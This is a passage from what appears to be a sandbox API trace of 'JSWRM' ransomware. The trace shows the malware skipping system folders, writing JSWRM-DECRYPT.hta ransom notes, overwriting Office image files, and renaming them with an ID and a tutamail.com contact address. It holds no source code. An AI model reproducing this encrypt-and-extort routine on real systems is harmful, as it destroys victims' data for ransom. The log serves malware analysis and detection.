ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x197a4903, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x44e347ac, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="..", cAlternateFileName="")) returned 1 [0131.246] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0131.246] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0131.246] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x197a4903, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1983d259, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1983d259, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="groove.net", cAlternateFileName="")) returned 1 [0131.246] lstrcmpiW (lpString1="groove.net", lpString2=".") returned 1 [0131.246] lstrcmpiW (lpString1="groove.net", lpString2="..") returned 1 [0131.246] lstrcmpiW (lpString1="groove.net", lpString2="...") returned 1 [0131.246] lstrcmpiW (lpString1="groove.net", lpString2="windows") returned -1 [0131.246] lstrcmpiW (lpString1="groove.net", lpString2="recovery") returned -1 [0131.246] lstrcmpiW (lpString1="groove.net", lpString2="perflogs") returned -1 [0131.246] lstrcmpiW (lpString1="groove.net", lpString2="documents and settings") returned 1 [0131.246] lstrcmpiW (lpString1="groove.net", lpString2="$RECYCLE.BIN") returned 1 [0131.246] lstrcmpiW (lpString1="groove.net", lpString2="system volume information") returned -1 [0131.246] lstrcmpiW (lpString1="groove.net", lpString2="msocache") returned -1 [0131.246] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\jswrm-decrypt.hta")) returned 0xffffffff [0131.247] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.247] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.247] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0131.248] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.248] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0131.250] CloseHandle (hObject=0x314) returned 1 [0131.250] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\jswrm-decrypt.hta")) returned 0x20 [0131.250] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x197a4903, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1983d259, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x44e347ac, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x210d28, cFileName=".", cAlternateFileName="")) returned 0x231d40 [0131.250] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0131.250] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x197a4903, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1983d259, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x44e347ac, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x210d28, cFileName="..", cAlternateFileName="")) returned 1 [0131.250] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0131.250] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0131.250] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x197a4903, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x198afa29, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x198afa29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x210d28, cFileName="CommonData", cAlternateFileName="COMMON~1")) returned 1 [0131.250] lstrcmpiW (lpString1="CommonData", lpString2=".") returned 1 [0131.250] lstrcmpiW (lpString1="CommonData", lpString2="..") returned 1 [0131.250] lstrcmpiW (lpString1="CommonData", lpString2="...") returned 1 [0131.250] lstrcmpiW (lpString1="CommonData", lpString2="windows") returned -1 [0131.250] lstrcmpiW (lpString1="CommonData", lpString2="recovery") returned -1 [0131.250] lstrcmpiW (lpString1="CommonData", lpString2="perflogs") returned -1 [0131.250] lstrcmpiW (lpString1="CommonData", lpString2="documents and settings") returned -1 [0131.250] lstrcmpiW (lpString1="CommonData", lpString2="$RECYCLE.BIN") returned 1 [0131.250] lstrcmpiW (lpString1="CommonData", lpString2="system volume information") returned -1 [0131.250] lstrcmpiW (lpString1="CommonData", lpString2="msocache") returned -1 [0131.250] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\jswrm-decrypt.hta")) returned 0xffffffff [0131.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.261] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0131.264] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.264] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0131.265] CloseHandle (hObject=0x338) returned 1 [0131.265] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\jswrm-decrypt.hta")) returned 0x20 [0131.265] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x197a4903, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x198afa29, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x44e5aa5b, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x2175ae, cFileName=".", cAlternateFileName="")) returned 0x231f80 [0131.266] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0131.266] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x197a4903, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x198afa29, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x44e5aa5b, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x2175ae, cFileName="..", cAlternateFileName="")) returned 1 [0131.267] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0131.267] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0131.267] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x197a4903, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x197a4903, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x197a4903, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x44c9, dwReserved0=0x60002, dwReserved1=0x2175ae, cFileName="AlertImage_Auto.jpg", cAlternateFileName="ALERTI~1.JPG")) returned 1 [0131.267] lstrcmpiW (lpString1="AlertImage_Auto.jpg", lpString2=".") returned 1 [0131.267] lstrcmpiW (lpString1="AlertImage_Auto.jpg", lpString2="..") returned 1 [0131.267] lstrcmpiW (lpString1="AlertImage_Auto.jpg", lpString2="...") returned 1 [0131.267] lstrcmpiW (lpString1="AlertImage_Auto.jpg", lpString2="windows") returned -1 [0131.267] lstrcmpiW (lpString1="AlertImage_Auto.jpg", lpString2="recovery") returned -1 [0131.267] lstrcmpiW (lpString1="AlertImage_Auto.jpg", lpString2="perflogs") returned -1 [0131.267] lstrcmpiW (lpString1="AlertImage_Auto.jpg", lpString2="documents and settings") returned -1 [0131.267] lstrcmpiW (lpString1="AlertImage_Auto.jpg", lpString2="$RECYCLE.BIN") returned 1 [0131.267] lstrcmpiW (lpString1="AlertImage_Auto.jpg", lpString2="system volume information") returned -1 [0131.267] lstrcmpiW (lpString1="AlertImage_Auto.jpg", lpString2="msocache") returned -1 [0131.267] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_Auto.jpg", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0131.267] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_Auto.jpg", cchWideChar=19, lpMultiByteStr=0x2413d0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AlertImage_Auto.jpg", lpUsedDefaultChar=0x0) returned 19 [0131.267] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_Auto.jpg", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0131.267] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_Auto.jpg", cchWideChar=19, lpMultiByteStr=0x2410d8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AlertImage_Auto.jpg", lpUsedDefaultChar=0x0) returned 19 [0131.267] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.267] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345dec4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.267] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_Auto.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\alertimage_auto.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0131.268] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x345de58 | out: lpFileSize=0x345de58*=17609) returned 1 [0131.268] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.268] ReadFile (in: hFile=0x264, lpBuffer=0x27b348, nNumberOfBytesToRead=0x44c0, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345de64*=0x44c0, lpOverlapped=0x0) returned 1 [0131.276] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.276] WriteFile (in: hFile=0x264, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x44c0, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345de60*=0x44c0, lpOverlapped=0x0) returned 1 [0131.276] CloseHandle (hObject=0x264) returned 1 [0131.277] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_Auto.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\alertimage_auto.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_Auto.jpg.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\alertimage_auto.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.278] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x197a4903, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x197a4903, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x197a4903, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1c6e, dwReserved0=0x60002, dwReserved1=0x2175ae, cFileName="AlertImage_AutoMask.bmp", cAlternateFileName="ALERTI~1.BMP")) returned 1 [0131.278] lstrcmpiW (lpString1="AlertImage_AutoMask.bmp", lpString2=".") returned 1 [0131.278] lstrcmpiW (lpString1="AlertImage_AutoMask.bmp", lpString2="..") returned 1 [0131.278] lstrcmpiW (lpString1="AlertImage_AutoMask.bmp", lpString2="...") returned 1 [0131.278] lstrcmpiW (lpString1="AlertImage_AutoMask.bmp", lpString2="windows") returned -1 [0131.278] lstrcmpiW (lpString1="AlertImage_AutoMask.bmp", lpString2="recovery") returned -1 [0131.278] lstrcmpiW (lpString1="AlertImage_AutoMask.bmp", lpString2="perflogs") returned -1 [0131.278] lstrcmpiW (lpString1="AlertImage_AutoMask.bmp", lpString2="documents and settings") returned -1 [0131.278] lstrcmpiW (lpString1="AlertImage_AutoMask.bmp", lpString2="$RECYCLE.BIN") returned 1 [0131.278] lstrcmpiW (lpString1="AlertImage_AutoMask.bmp", lpString2="system volume information") returned -1 [0131.278] lstrcmpiW (lpString1="AlertImage_AutoMask.bmp", lpString2="msocache") returned -1 [0131.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_AutoMask.bmp", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0131.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_AutoMask.bmp", cchWideChar=23, lpMultiByteStr=0x240f48, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AlertImage_AutoMask.bmp", lpUsedDefaultChar=0x0) returned 23 [0131.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_AutoMask.bmp", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0131.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_AutoMask.bmp", cchWideChar=23, lpMultiByteStr=0x2410d8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AlertImage_AutoMask.bmp", lpUsedDefaultChar=0x0) returned 23 [0131.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345dec4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.278] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_AutoMask.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\alertimage_automask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0131.279] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x345de58 | out: lpFileSize=0x345de58*=7278) returned 1 [0131.279] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.279] ReadFile (in: hFile=0x264, lpBuffer=0x27b348, nNumberOfBytesToRead=0x1c60, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345de64*=0x1c60, lpOverlapped=0x0) returned 1 [0131.281] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.281] WriteFile (in: hFile=0x264, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x1c60, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345de60*=0x1c60, lpOverlapped=0x0) returned 1 [0131.281] CloseHandle (hObject=0x264) returned 1 [0131.281] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_AutoMask.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\alertimage_automask.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_AutoMask.bmp.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\alertimage_automask.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.282] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x19817013, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x19817013, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x19817013, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3356, dwReserved0=0x60002, dwReserved1=0x2175ae, cFileName="AlertImage_ContactHigh.jpg", cAlternateFileName="AL8858~1.JPG")) returned 1 [0131.282] lstrcmpiW (lpString1="AlertImage_ContactHigh.jpg", lpString2=".") returned 1 [0131.282] lstrcmpiW (lpString1="AlertImage_ContactHigh.jpg", lpString2="..") returned 1 [0131.282] lstrcmpiW (lpString1="AlertImage_ContactHigh.jpg", lpString2="...") returned 1 [0131.282] lstrcmpiW (lpString1="AlertImage_ContactHigh.jpg", lpString2="windows") returned -1 [0131.282] lstrcmpiW (lpString1="AlertImage_ContactHigh.jpg", lpString2="recovery") returned -1 [0131.282] lstrcmpiW (lpString1="AlertImage_ContactHigh.jpg", lpString2="perflogs") returned -1 [0131.282] lstrcmpiW (lpString1="AlertImage_ContactHigh.jpg", lpString2="documents and settings") returned -1 [0131.282] lstrcmpiW (lpString1="AlertImage_ContactHigh.jpg", lpString2="$RECYCLE.BIN") returned 1 [0131.282] lstrcmpiW (lpString1="AlertImage_ContactHigh.jpg", lpString2="system volume information") returned -1 [0131.283] lstrcmpiW (lpString1="AlertImage_ContactHigh.jpg", lpString2="msocache") returned -1 [0131.283] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_ContactHigh.jpg", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0131.283] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_ContactHigh.jpg", cchWideChar=26, lpMultiByteStr=0x241128, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AlertImage_ContactHigh.jpg", lpUsedDefaultChar=0x0) returned 26 [0131.283] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_ContactHigh.jpg", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0131.283] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_ContactHigh.jpg", cchWideChar=26, lpMultiByteStr=0x241178, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AlertImage_ContactHigh.jpg", lpUsedDefaultChar=0x0) returned 26 [0131.283] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.283] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345dec4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.283] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_ContactHigh.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\alertimage_contacthigh.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0131.284] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x345de58 | out: lpFileSize=0x345de58*=13142) returned 1 [0131.284] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.284] ReadFile (in: hFile=0x264, lpBuffer=0x27b348, nNumberOfBytesToRead=0x3350, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345de64*=0x3350, lpOverlapped=0x0) returned 1 [0131.286] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.286] WriteFile (in: hFile=0x264, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x3350, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345de60*=0x3350, lpOverlapped=0x0) returned 1 [0131.287] CloseHandle (hObject=0x264) returned 1 [0131.287] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_ContactHigh.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\alertimage_contacthigh.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_ContactHigh.jpg.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\alertimage_contacthigh.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.288] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x19817013, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x19817013, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1983d259, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1c70, dwReserved0=0x60002, dwReserved1=0x2175ae, cFileName="AlertImage_ContactHighMask.bmp", cAlternateFileName="AL2220~1.BMP")) returned 1 [0131.288] lstrcmpiW (lpString1="AlertImage_ContactHighMask.bmp", lpString2=".") returned 1 [0131.288] lstrcmpiW (lpString1="AlertImage_ContactHighMask.bmp", lpString2="..") returned 1 [0131.288] lstrcmpiW (lpString1="AlertImage_ContactHighMask.bmp", lpString2="...") returned 1 [0131.288] lstrcmpiW (lpString1="AlertImage_ContactHighMask.bmp", lpString2="windows") returned -1 [0131.288] lstrcmpiW 